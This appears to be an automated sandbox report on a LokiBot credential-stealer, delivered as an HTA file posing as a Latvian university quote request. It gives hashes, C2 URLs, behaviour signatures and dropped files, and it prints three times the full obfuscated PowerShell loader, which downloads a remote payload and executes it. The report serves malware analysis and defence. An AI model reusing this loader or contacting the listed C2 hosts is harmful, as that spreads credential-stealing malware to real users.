Overview

overview

10

Static

static

1

Piedāvāj...ta.hta

windows7-x64

10

Piedāvāj...ta.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    98s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 03:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Piedāvājuma pieprasījums (Ventspils Augstskolas) LV24-0926hta.hta

  • Size

    7KB

  • MD5

    6478016f557127bcb15e168eb8275c75

  • SHA1

    595e5d9cc7472660ec4e0c182a633014a43c974c

  • SHA256

    acc9d013bc7c54953fd61c5626bcb2378452656ab98a3ef7c9bdeb5b57455933

  • SHA512

    b5a9873d8c1ea36d7aae2e4974f233616221a316deb05ca5dd8b1c423f191c8cd8538f55d13f4d62cc4dab9347bd4b45d93f7dab5acf2d91f7041ceeb578ec46

  • SSDEEP

    96:bpYfMEPTs5q+PgNbvrQZwJrOX32pdF60+oKOnPFIi/fds1R7b8eEj+ErV3/53/yw:yVsiBvrQSNOWp1nh1y7bgq+VRPFih8Gc

Score
10/10
lokibotcollectiondiscoveryspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://168.100.10.152/index.php/wp.php?view=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Piedāvājuma pieprasījums (Ventspils Augstskolas) LV24-0926hta.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2912
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:692
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2548

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SG2X984RT2870MFS5058.temp
    Filesize

    7KB

    MD5

    a1f51a550e89b9dd8608a54afd14320d

    SHA1

    fd059e858e8bf3a705570b32c65ad1001d74e284

    SHA256

    183b0e80208371e0bc124351dc03bce7895c6e42d9c2b92f3d6f5829c970e195

    SHA512

    9e43c59e9566cc85a6b75ca5402cb82b77778f63cb406c76f749857aa8773b91f7865ec00cb980bfb2971c6bb43d3b78c35af45c5c7b237c960b1f3f4c826bb7

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    ee0b430b14962ca11731ca1b19565278

    SHA1

    836c97f60c32c3f35d6c2478e85c149a7e6d06ff

    SHA256

    d3f5f429e6b2844a3bca7a709c245cc44b9181ea61329875a59152192cb00634

    SHA512

    d2f6a4e7a65737939f02309bec2657959c7c1b4b3ed9e57af5d754c83542e67f17c8e20228e6bb67f445e83d4dec83265c61970fa80f55f2b1c595acd46c2a7f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Ulp.Blo
    Filesize

    472KB

    MD5

    183f1f76a0c8b3f31dc2cfea13cf9d18

    SHA1

    ebe5f2cea1f7735bf57a6b7ed72259b2d1e773af

    SHA256

    21a0922961a9c910c6d3763c41a17a6a687b7c6da22f8117e84c90c6b836553c

    SHA512

    a1bd075f13086a534f8dbeab8428e0d75ccbbf176cf321eb1aa1e0c1a61ac54ddc1f0351aaa91e787fa4fb4f24bb8e477f9655dfb9d48b8cdd92379200b5f3e7

    Download Submit

  • memory/692-13-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/692-14-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1156-21-0x0000000006770000-0x0000000008CD0000-memory.dmp

    Filesize

    37.4MB

    Download

  • memory/2548-43-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2548-44-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download